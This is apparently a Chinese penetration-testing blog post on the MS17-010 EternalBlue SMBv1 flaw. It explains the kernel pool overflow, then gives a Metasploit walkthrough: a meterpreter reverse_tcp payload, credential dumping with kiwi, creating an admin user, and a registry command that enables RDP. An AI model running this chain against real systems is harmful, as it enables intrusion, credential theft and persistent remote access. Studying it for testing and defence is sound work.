MS-17010总结

  • 原理介绍
  • 漏洞利用
    • MSF
    • Ladon

原理介绍

永恒之蓝(ms17-010)过TCP端口445和139
来利用SMBv1 SMB 协议 即 SMBv1 全名: Server Message Block
和NBT中的远程代码执行漏洞,
恶意代码会扫描开放445文件共享端口的Windows机器,
无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt
在处理FEA(File Extended Attributes)转换时,
在大非分页池(内核的数据结构,Large Non-Paged Kernel Pool)上存在缓冲区溢出。

函数srv!SrvOs2FeaListToNt在将FEA list转换成NTFEA(Windows NT FEA) list前会调用srv!SrvOs2FeaListSizeToNt去计算转换后的FEA lsit的大小。
然后会进行如下操作:
srv!SrvOs2FeaListSizeToNt会计算FEA list的大小并更新待转换的FEA list的大小
因为错误的使用WORD强制类型转换,导致计算出来的待转换的FEA list的大小比真正的FEA list大
因为原先的总大小计算错误,导致当FEA list被转化为NTFEA list时,会在非分页池导致缓冲区溢出

目前已知受影响的Windows 版本包括但不限于:
WindowsNT,2000、 XP、 2003、Vista、 7、 8,2008、2008 R2、2012 SP0。

漏洞利用

MSF

搜索ms17_010漏洞:search ms17_010
进入漏洞模块: use exploit/windows/smb/ms17_010_eternalblue
查看漏洞模块信息:info
设置攻击目标:set RHOSTS 172.16.7.180
查看可用的攻击payload:show payloads
选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp
设置接收信息的本地设备:set LHOST 172.16.7.95 and port
最后检查下当前的配置:show options
开始攻击:exploit
直接拿到目标的Shell,然后任意命令执行
获取用户密码
load kiwi
进程迁移
creds_all
shell切换到控制机dos界面
创建新用户
提升至管理员权限
输入 net localgroup administrators查看管理员都有谁
开启 远程桌面控制

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

rdesktop x.x.x.x:3389

Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets

Ladon

http://k8gege.org/Ladon/cmddll.html

https://blog.csdn.net/k8gege/article/details/112253408

渗透测试-内网横向MS-17010利用方法总结相关推荐

  1. 渗透测试-内网横向移动专题

    渗透测试-内网横向与提权专题 windows凭据窃取 Mimikatz Procdump Get-PassHashes.ps1 Windows远程连接和相关命令 IPC 利用条件 通过net来建立连接 ...

  2. 12.5、后渗透测试--内网主机屏幕截图

    攻击主机: Kali 192.168.11.106 靶机:windows server 2008 r2  192.168.11.134 前提: 获得 meterpreter shell 操作屏幕的几种 ...

  3. 内网横向渗透之各种传递攻击

    内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透. ...

  4. 内网横向渗透神器-CS

    简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrik ...

  5. 细说内网横向工具WMIHACK

    目录 1.前言 2. 基础知识 2.1 WMI简介 2.2 WMI体系结构 2.3 WMI的类与命名空间 2.4 查询WMI 2.5 管理WMI 2.6 WMI事件 3.工具分析 3.1 WMIHAC ...

  6. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  7. 通过SOCKS代理渗透整个内网

    通过SOCKS代理渗透整个内网 1.背景 经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它. 注意:本次环境在本地搭建,假设现在 ...

  8. 通过WIFI渗透到内网服务器和主机

    测试目的:通过WIFI渗透到内网,并对内网进行扫描,收集设备信息,并尽可能的拿到多的权限. 测试设备:两台笔记本电脑 :PC1, PC2 ; 一个USB无线网卡RT5572; 一个无线AP 测试环境: ...

  9. 内网渗透-Linux内网渗透

    系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...

  10. 内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)

    内网安全:Cobalt Strike 工具 渗透多层内网主机. Cobalt Strike 是一款以 metasploit 为基础的 GUI 的框架式渗透工具,又被业界人称为 CS.拥有多种协议主机上 ...

最新文章

  1. [转载 css]word-wrap,word-break,white-space,text-overflow的区别和用法
  2. 小牛带你nginx反向代理中神奇的斜线
  3. php ssl 不验证失败,php – 没有SSL的安全身份验证
  4. Java大新闻不断涌现:Java SE 6和OpenJDK
  5. 产品认识:一个可直接套用的产品分析框架(纯干货)
  6. @font-face 使用过程
  7. linux修改挂载目录名字,linux下修改mount挂载目录名
  8. apache服务器详细配置
  9. tensorflow2.0对应python版本_TensorFlow2.1.0最新版本安装详细教程
  10. 复化辛普森公式求二重积分matlab源码及例题
  11. archlinux i3wm flameshot使用
  12. VS2019插件VSIX开发
  13. php codeigniter 语言,CodeIgniter多语言实现方法详解
  14. 两轮差速机器人ROS下速度解算
  15. 使用 Swift 语言编程的优缺点
  16. Samba服务所使用的端口和协议
  17. 今天北京的天空是湛蓝的
  18. linux用不了wifi密码忘记了,极路由wifi密码忘记了怎么办?
  19. 相信美好-20200809
  20. 关于android手机桌面应用图标的角标通知

热门文章

  1. LaTex软件安装方式
  2. watir学习系列--对话框处理
  3. python中fontsize_python size
  4. 计算机硬件常见的故障及维修方法,计算机硬件常见故障及解决方法
  5. 小米 线刷 android,小米10 Android 11 Beta 1线刷包已放出,安卓11/MIUI 12二选一
  6. VB_NET程序设计教程
  7. 创业教父Paul Graham: 穷途末路还是康庄大道
  8. 服务器网口聚合操作文档,服务器网口聚合怎么操作
  9. Django序列化器
  10. HTML5前端设计——课表制作